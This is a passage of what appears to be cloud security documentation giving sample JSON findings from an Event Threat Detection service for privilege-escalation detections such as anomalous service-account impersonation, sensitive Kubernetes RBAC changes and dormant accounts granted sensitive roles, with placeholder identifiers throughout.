      { "gcpResourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1675913160",
            "nanos": 929341814
          },
          "insertId": "o5ii7hddddd"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://atlas.mitre.org/techniques/AML.T0012/"
      }
    }
  }
}

Privilege Escalation: Anomalous Service Account Impersonator for AI Data Access

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {},
      "serviceName": "aiplatform.googleapis.com",
      "methodName": "METHOD_NAME",
      "serviceAccountDelegationInfo": [
        { "principalEmail": "PRINCIPAL_EMAIL" },
        { "principalEmail": "PRINCIPAL_EMAIL" }
      ]
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Privilege Escalation: Anomalous Service Account Impersonator for AI Data Access",
    "cloudDlpInspection": {},
    "contacts": {
      "security": {
        "contacts": [
          { "email": "EMAIL_ADDRESS" }
        ]
      }
    },
    "createTime": "2023-02-09T03:26:04.611Z",
    "database": {},
    "eventTime": "2023-02-09T03:26:05.403Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "INITIAL_ACCESS",
      "primaryTechniques": [ "VALID_ACCOUNTS" ]
    },
    "muteInfo": {
      "staticMute": {
        "state": "UNDEFINED",
        "applyTime": "1970-01-01T00:00:00Z"
      }
    },
    "domains": [
      { "category": "AI" },
      { "category": "IDENTITY_AND_ACCESS" }
    ],
    "aiModel": {
      "name": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
      "deploymentPlatform": "VERTEX_AI"
    },
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
    "severity": "MEDIUM",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "displayName": "projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "parentDisplayName": "PROJECT_ID",
      "organization": "organizations/ORGANIZATION_ID"
    },
    "type": "google.aiplatform.Model",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "ai_anomalous_sa_delegation_impersonator_data_access" },
    "detectionPriority": "MEDIUM",
    "affectedResources": [
      { "gcpResourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1675913160",
            "nanos": 929341814
          },
          "insertId": "o5ii7hddddd"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://atlas.mitre.org/techniques/AML.T0012/"
      }
    }
  }
}

Privilege Escalation: Anomalous Service Account Impersonator for Data Access

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {},
      "serviceName": "storage.googleapis.com",
      "methodName": "storage.buckets.list",
      "serviceAccountDelegationInfo": [
        { "principalEmail": "PRINCIPAL_EMAIL" },
        { "principalEmail": "PRINCIPAL_EMAIL" }
      ]
    },
    "assetDisplayName": "PROJECT_ID",
    "assetId": "organizations/ORGANIZATION_ID/assets/ASSET_ID",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Privilege Escalation: Anomalous Service Account Impersonator for Data Access",
    "cloudDlpInspection": {},
    "contacts": {
      "security": {
        "contacts": [
          { "email": "EMAIL_ADDRESS" }
        ]
      }
    },
    "createTime": "2023-02-09T03:26:04.611Z",
    "database": {},
    "eventTime": "2023-02-09T03:26:05.403Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "INITIAL_ACCESS",
      "primaryTechniques": [ "VALID_ACCOUNTS" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "MEDIUM",
    "sourceDisplayName": "Event Threat Detection",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "ORGANIZATION",
    "type": "google.cloud.resourcemanager.Project",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "anomalous_sa_delegation_impersonator_data_access" },
    "detectionPriority": "MEDIUM",
    "affectedResources": [
      { "gcpResourceName": "//storage.googleapis.com/" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1675913160",
            "nanos": 929341814
          },
          "insertId": "o5ii7hddddd"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1078/"
      }
    }
  }
}

Privilege Escalation: Changes to sensitive Kubernetes RBAC objects

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": { "regionCode": "US" },
      "serviceName": "k8s.io",
      "methodName": "io.k8s.authorization.rbac.v1.clusterrolebindings.update"
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/05b52fe8267d44bdb33c89367f0dd11a",
    "category": "Privilege Escalation: Changes to sensitive Kubernetes RBAC objects",
    "contacts": {
      "technical": {
        "contacts": [
          { "email": "EMAIL_ADDRESS" },
          { "email": "EMAIL_ADDRESS" },
          { "email": "EMAIL_ADDRESS" }
        ]
      }
    },
    "createTime": "2022-10-07T07:42:36.536Z",
    "database": {},
    "eventTime": "2022-10-07T07:42:06.044Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd",
    "indicator": {},
    "kubernetes": {
      "bindings": [
        {
          "name": "cluster-admin",
          "role": {
            "kind": "CLUSTER_ROLE",
            "name": "cluster-admin"
          },
          "subjects": [
            {
              "kind": "USER",
              "name": "testUser-1665153212"
            }
          ]
        }
      ]
    },
    "mitreAttack": {},
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/05b52fe8267d44bdb33c89367f0dd11a",
    "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME",
    "severity": "LOW",
    "sourceDisplayName": "Event Threat Detection",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME",
    "display_name": "CLUSTER_NAME",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": [
      {
        "resourceFolderDisplayName": "FOLDER_NAME",
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER"
      }
    ]
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "gke_control_plane",
      "subRuleName": "edit_sensitive_rbac_object"
    },
    "detectionPriority": "LOW",
    "affectedResources": [
      { "gcpResourceName": "//k8s.io/rbac.authorization.k8s.io/v1/clusterrolebindings/cluster-admin" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1665128526",
            "nanos": 44146000
          },
          "insertId": "5d80de5c-84b8-4f42-84c7-6b597162e00a"
        }
      }
    ],
    "properties": {},
    "findingId": "05b52fe8267d44bdb33c89367f0dd11a",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/tactics/TA0004/"
      },
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222022-10-07T07:42:06.044146Z%22%0AinsertId%3D%225d80de5c-84b8-4f42-84c7-6b597162e00a%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project=PROJECT_ID"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}

Privilege Escalation: Create Kubernetes CSR for master cert

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": { "regionCode": "US" },
      "serviceName": "k8s.io",
      "methodName": "io.k8s.certificates.v1.certificatesigningrequests.create"
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/0562169c2e3b44879030a7369dbf839c",
    "category": "Privilege Escalation: Create Kubernetes CSR for master cert",
    "contacts": {
      "technical": {
        "contacts": [
          { "email": "EMAIL_ADDRESS" },
          { "email": "EMAIL_ADDRESS" },
          { "email": "EMAIL_ADDRESS" }
        ]
      }
    },
    "createTime": "2022-10-08T14:38:12.501Z",
    "database": {},
    "eventTime": "2022-10-08T14:37:46.944Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd",
    "indicator": {},
    "kubernetes": {},
    "mitreAttack": {},
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/0562169c2e3b44879030a7369dbf839c",
    "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME",
    "severity": "HIGH",
    "sourceDisplayName": "Event Threat Detection",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME",
    "display_name": "CLUSTER_NAME",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": [
      {
        "resourceFolderDisplayName": "FOLDER_NAME",
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER"
      }
    ]
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "gke_control_plane",
      "subRuleName": "csr_for_master_cert"
    },
    "detectionPriority": "HIGH",
    "affectedResources": [
      { "gcpResourceName": "//k8s.io/certificates.k8s.io/v1/certificatesigningrequests/node-csr-fake-master" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1665239866",
            "nanos": 944045000
          },
          "insertId": "4d17b41e-7f56-43dc-9b72-abcbdc64f101"
        }
      }
    ],
    "properties": {},
    "findingId": "0562169c2e3b44879030a7369dbf839c",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/tactics/TA0004/"
      },
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222022-10-08T14:37:46.944045Z%22%0AinsertId%3D%224d17b41e-7f56-43dc-9b72-abcbdc64f101%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project=PROJECT_ID"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}

Privilege Escalation: Creation of sensitive Kubernetes bindings

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": { "regionCode": "US" },
      "serviceName": "k8s.io",
      "methodName": "io.k8s.authorization.rbac.v1.clusterrolebindings.create"
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/02dcbf565d9d4972a126ac3c38fd4295",
    "category": "Privilege Escalation: Creation of sensitive Kubernetes bindings",
    "contacts": {
      "technical": {
        "contacts": [
          { "email": "EMAIL_ADDRESS" },
          { "email": "EMAIL_ADDRESS" },
          { "email": "EMAIL_ADDRESS" }
        ]
      }
    },
    "createTime": "2022-10-11T09:29:44.425Z",
    "database": {},
    "eventTime": "2022-10-11T09:29:26.309Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd",
    "indicator": {},
    "kubernetes": {
      "bindings": [
        {
          "name": "cluster-admin",
          "role": {
            "kind": "CLUSTER_ROLE",
            "name": "cluster-admin"
          }
        }
      ]
    },
    "mitreAttack": {},
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/02dcbf565d9d4972a126ac3c38fd4295",
    "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME",
    "severity": "LOW",
    "sourceDisplayName": "Event Threat Detection",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME",
    "display_name": "CLUSTER_NAME",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": [
      {
        "resourceFolderDisplayName": "FOLDER_NAME",
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER"
      }
    ]
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "gke_control_plane",
      "subRuleName": "create_sensitive_binding"
    },
    "detectionPriority": "LOW",
    "affectedResources": [
      { "gcpResourceName": "//k8s.io/rbac.authorization.k8s.io/v1/clusterrolebindings/cluster-admin" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1665480566",
            "nanos": 309136000
          },
          "insertId": "e4b2fb24-a118-4d74-80ea-2ec069251321"
        }
      }
    ],
    "properties": {},
    "findingId": "02dcbf565d9d4972a126ac3c38fd4295",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/tactics/TA0004/"
      },
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222022-10-11T09:29:26.309136Z%22%0AinsertId%3D%22e4b2fb24-a118-4d74-80ea-2ec069251321%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project=PROJECT_ID"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}

Privilege Escalation: Default Compute Engine Service Account SetIAMPolicy

{
  "finding": {
    "access": {
      "principalEmail": "PROJECT_NUMBER-compute@developer.gserviceaccount.com",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": { "regionCode": "REGION_CODE" },
      "userAgent": "USER_AGENT",
      "serviceName": "run.googleapis.com",
      "methodName": "google.cloud.run.v1.Services.SetIamPolicy",
      "principalSubject": "serviceAccount:PROJECT_NUMBER-compute@developer.gserviceaccount.com",
      "serviceAccountDelegationInfo": [
        { "principalEmail": "service-PROJECT_NUMBER@serverless-robot-prod.iam.gserviceaccount.com" }
      ]
    },
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/global/findings/FINDING_ID",
    "category": "Privilege Escalation: Default Compute Engine Service Account SetIAMPolicy",
    "chokepoint": {},
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "createTime": "2025-05-27T20:36:26.627Z",
    "database": {},
    "dataProtectionKeyGovernance": {},
    "eventTime": "2025-05-27T20:36:26.527Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "logEntries": [
      {
        "cloudLoggingEntry": {
          "insertId": "INSERT_ID",
          "logId": "cloudaudit.googleapis.com/activity",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": "2025-05-27T20:35:26.897015Z"
        }
      }
    ],
    "mitreAttack": {
      "primaryTactic": "PRIVILEGE_ESCALATION",
      "primaryTechniques": [ "ADDITIONAL_CLOUD_ROLES" ]
    },
    "mute": "UNDEFINED",
    "muteInfo": {
      "staticMute": {
        "state": "UNDEFINED",
        "applyTime": "1970-01-01T00:00:00Z"
      }
    },
    "muteUpdateTime": "1970-01-01T00:00:00Z",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//run.googleapis.com/projects/PROJECT_ID/locations/REGION/services/SERVICE_NAME",
    "securityPosture": {},
    "severity": "LOW",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//run.googleapis.com/projects/PROJECT_ID/locations/REGION/services/SERVICE_NAME",
    "displayName": "SERVICE_NAME",
    "type": "google.run.Service",
    "cloudProvider": "GOOGLE_CLOUD_PLATFORM",
    "service": "run.googleapis.com",
    "location": "REGION",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "parentDisplayName": "PROJECT_ID",
      "organization": "organizations/ORGANIZATION_ID"
    },
    "resourcePath": {
      "nodes": [
        {
          "nodeType": "GCP_PROJECT",
          "id": "projects/PROJECT_NUMBER",
          "displayName": "PROJECT_ID"
        },
        {
          "nodeType": "GCP_ORGANIZATION",
          "id": "organizations/ORGANIZATION_ID"
        }
      ]
    },
    "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_NUMBER"
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "cloud_run_services_set_iam_policy" },
    "detectionPriority": "LOW",
    "affectedResources": [
      { "gcpResourceName": "//run.googleapis.com/projects/PROJECT_ID/locations/REGION/services/SERVICE_NAME" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1748378126",
            "nanos": 897015000
          },
          "insertId": "INSERT_ID",
          "logId": "cloudaudit.googleapis.com/activity"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1098/003/"
      },
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "LINK_TO_LOG_QUERY"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}

Privilege Escalation: Dormant Service Account Granted Sensitive Role

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": { "regionCode": "REGION_CODE" },
      "serviceName": "cloudresourcemanager.googleapis.com",
      "methodName": "SetIamPolicy"
    },
    "assetDisplayName": "ASSET_DISPLAY_NAME",
    "assetId": "organizations/ORGANIZATION_ID/assets/ASSET_ID",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Privilege Escalation: Dormant Service Account Granted Sensitive Role",
    "cloudDlpInspection": {},
    "contacts": {
      "security": {
        "contacts": [
          { "email": "EMAIL_ADDRESS_1" },
          { "email": "EMAIL_ADDRESS_2" }
        ]
      },
      "technical": {
        "contacts": [
          { "email": "EMAIL_ADDRESS_3" },
          { "email": "EMAIL_ADDRESS_4" }
        ]
      }
    },
    "createTime": "CREATE_TIMESTAMP",
    "database": {},
    "eventTime": "EVENT_TIMESTAMP",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "iamBindings": [
      {
        "action": "ADD",
        "role": "SENSITIVE_IAM_ROLE",
        "member": "serviceAccount:DORMANT_SERVICE_ACCOUNT"
      }
    ],
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "INITIAL_ACCESS",
      "primaryTechniques": [ "VALID_ACCOUNTS", "CLOUD_ACCOUNTS" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "RESOURCE_FULL_NAME",
    "severity": "SEVERITY_CLASSIFICATION",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "RESOURCE_FULL_NAME",
    "display_name": "RESOURCE_DISPLAY_NAME",
    "project_name": "//RESOURCE/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "RESOURCE_PARENT_NAME",
    "parent_display_name": "PARENT_DISPLAY_NAME",
    "type": "RESOURCE_TYPE",
    "folders": [
      {
        "resourceFolderDisplayName": "RESOURCE_FOLDER_DISPLAY_NAME",
        "resourceFolder": "RESOURCE_FOLDER_ID"
      }
    ]
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "sensitive_role_added_to_dormant_sa" },
    "detectionPriority": "HIGH",
    "affectedResources": [
      { "gcpResourceName": "GOOGLE_CLOUD_RESOURCE_NAME" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1678897327",
            "nanos": 26483000
          },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1078/004/"
      },
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "LINK_TO_LOG_QUERY"
        }
      ]
    }
  }
}

Privilege Escalation: External Member Added To Privileged Group

This finding isn't available for project-level activations.

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//cloudidentity.googleapis.com/groups/GROUP_NAME@ORGANIZATION_NAME",
    "state": "ACTIVE",
    "category": "Privilege Escalation: External Member Added To Privileged Group",
    "sourceProperties": {
      "sourceId": {
        "organizationNumber": "ORGANIZATION_ID",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "persistence",
        "indicator": "audit_log",
        "ruleName": "external_member_added_to_privileged_group"
      },
      "detectionPriority": "HIGH",
      "affectedResources": [
        { "gcpResourceName": "//cloudidentity.googleapis.com/groups/GROUP_NAME@ORGANIZATION_NAME" },
        { "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID" }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "resourceContainer": "organizations/ORGANIZATION_ID",
            "timestamp": {
              "seconds": "1633622881",
              "nanos": 6.73869E8
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "externalMemberAddedToPrivilegedGroup": {
          "principalEmail": "PRINCIPAL_EMAIL",
          "groupName": "group:GROUP_NAME@ORGANIZATION_NAME",
          "externalMember": "user:EXTERNAL_EMAIL",
          "sensitiveRoles": [
            {
              "resource": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
              "roleName": [ "ROLES" ]
            }
          ]
        }
      },
      "findingId": "FINDING_ID",
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1078"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222021-10-07T16:08:01.673869Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22%22?project="
          }
        ]
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-10-07T16:08:03.888Z",
    "createTime": "2021-10-07T16:08:04.516Z",
    "severity": "HIGH",
    "workflowState": "NEW",
    "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "findingClass": "THREAT"
  },
  "resource": {
    "name": "//cloudidentity.googleapis.com/groups/GROUP_NAME@ORGANIZATION_NAME"
  }
}

Privilege Escalation: Get Kubernetes CSR with compromised bootstrap credentials

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": { "regionCode": "US" },
      "serviceName": "k8s.io",
      "methodName": "io.k8s.certificates.v1.certificatesigningrequests.list"
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/025e0ba774da4d678883257cd125fc43",
    "category": "Privilege Escalation: Get Kubernetes CSR with compromised bootstrap credentials",
    "contacts": {
      "technical": {
        "contacts": [
          { "email": "EMAIL_ADDRESS" },
          { "email": "EMAIL_ADDRESS" },
          { "email": "EMAIL_ADDRESS" }
        ]
      }
    },
    "createTime": "2022-10-12T12:28:11.480Z",
    "database": {},
    "eventTime": "2022-10-12T12:28:08.597Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd",
    "indicator": {},
    "kubernetes": {},
    "mitreAttack": {},
    "mute": "UNDEFINED",
